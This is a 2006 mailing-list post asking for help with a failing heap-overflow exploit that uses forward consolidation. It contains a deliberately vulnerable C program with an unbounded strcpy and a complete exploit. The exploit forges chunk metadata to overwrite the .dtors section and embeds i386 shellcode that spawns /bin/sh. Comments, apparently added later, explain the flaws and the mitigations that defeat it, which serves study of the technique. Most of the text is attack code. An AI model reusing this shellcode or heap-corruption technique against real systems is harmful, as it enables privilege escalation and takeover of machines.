heap overflow foreward consolidation
From: padre () correo ugr es
Date: Sat, 27 May 2006 01:27:26 +0200 (MEST)
Hi, im coding a heap verflow & exploit using foreward consolidation. I've been days looking at the code,but i didnt see nothing wrong. Why my xploit do not work? I think the fake chunk is constructed correctly, the padding is ok, the size is ok. Guys,can u tell me if the code is ok?? Maybe I forgotted something important (dont think so :-P) Thanks in advance!!

-[ DTOR INFO]-----------------------------------------------
mooo@localhost:~$ nm a | grep DTOR
080497e4 d __DTOR_END__
080497e0 d __DTOR_LIST__
------------------------------------------------------------
THIS IS THE BUGGY CODE
------------------------------------------------------------
/*
 * Deliberately vulnerable target: copies argv[1] into a 250-byte heap
 * chunk with an unbounded strcpy(), so an over-long argument writes past
 * p into whatever the allocator placed after it (the header of p2 in the
 * usual layout) and free(p) then operates on attacker-controlled chunk
 * metadata. The defensive fix is a bounded copy (snprintf/strlcpy with
 * sizeof the allocation) plus an argc check; it is left out here because
 * the program exists only to demonstrate the bug.
 *
 * The two hard-coded pointers below come from the nm output above and are
 * only meaningful for that exact non-PIE binary; with ASLR/PIE or RELRO
 * they are wrong or read-only.
 */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

int main (int argc, char **argv) {
    char *p,*p2;
    p = (char*)malloc(250);
    p2 = (char*)malloc(250);
    /* integer -> pointer without a cast: a constraint violation most
     * compilers only warn about; addresses taken from the nm listing */
    long *dtor_list = 0x080497e0;
    long *dtor_end = 0x080497e4;
    if (p && p2) printf("OK\n\n"); else exit(-1);
    /* %08x with a pointer argument is a format/argument mismatch (UB);
     * %p is the portable form */
    printf ("p1 @ 0x%08x \n", p);
    printf ("p2 @ 0x%08x \n", p2);
    /* argc is never checked: argv[1] is NULL when run without an argument
     * (NULL dereference), and no length bound protects the 250-byte chunk */
    strcpy(p,argv[1]);
    /* the allocator reads the (possibly overwritten) neighbouring chunk
     * header here; hardened allocators validate it before consolidating */
    free(p);
    printf ("dtors_list @ 0x%08x = 0x%08x \n", dtor_list, *dtor_list);
    printf ("dtors_end @ 0x%08x = 0x%08x \n ", dtor_end, *dtor_end);
    return 0;
}
----------------------------------------------------------
THIS IS THE EXPLOIT
----------------------------------------------------------
/*
 * Proof-of-concept as posted by the author, who reports that it does not
 * work. It depends on fixed, non-randomised i386 addresses (dtor_addr from
 * the nm output above, shellcode_addr derived from a constant stack top)
 * and on the target's allocator accepting attacker-supplied chunk metadata
 * at free(). NOTE(review): ASLR, a non-executable stack, RELRO (read-only
 * or absent .dtors in current toolchains) and glibc's unlink integrity
 * checks each defeat this class of PoC — confirm the intended target
 * configuration before drawing conclusions from it.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define TRASH 0xffffffff
#define FLAG 0x1

/* non-const global, so buffer[SIZE+1] in main() is a VLA (C99) */
int SIZE=(256+16);

int main (int argc, char **argv){
    char buffer[SIZE+1];
    char sc[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
                "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
                "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
                "\x68";
    /* shadows libc's global `environ`; passed as envp to execle() below,
     * so sc becomes the only environment string of the child */
    char *environ[]={sc,NULL};
    /* assumes a fixed stack top and 32-bit long (i386, no ASLR) */
    long shellcode_addr = 0xbffffffa - strlen(sc) - strlen("./a");
    long dtor_addr=0x080497e4;
    /* fill with 'A', then overwrite the last 16 bytes with crafted values */
    memset (buffer,'A',SIZE);
    /* type-punning a char array through (int *) casts: neither alignment
     * nor aliasing is guaranteed by the standard; memcpy() is the portable
     * form */
    *(int*)&buffer[(SIZE-16)] = (TRASH & ~FLAG);
    *(int*)&buffer[(SIZE-12)] = -4;
    *(int*)&buffer[(SIZE-8)] = (dtor_addr - 12);
    *(int*)&buffer[(SIZE-4)] = (shellcode_addr + 8);
    /* stores 4 bytes at offset SIZE of a SIZE+1 array: three bytes land
     * past the end of buffer (out-of-bounds stack write, UB); only a
     * single char store is in bounds here */
    *(int*)&buffer[SIZE]='\0';
    /* %d with a size_t and %08x with a long are format mismatches (UB on
     * targets where the widths differ) */
    printf("-| Shellcode (%d bytes) @ 0x%08x\n",strlen(sc),shellcode_addr);
    printf("-|-----------------------------------\n");
    printf("-| DTOR_END @ 0x%08x\n", dtor_addr);
    /* execle() replaces this process on success, so everything after it
     * runs only when the exec itself failed */
    if ( execle("./a","a",buffer,environ) < 0) { perror ("execle "); }
    printf("something wrong :-S \n");
    return 0;
}
--------------------------------------------------------------------------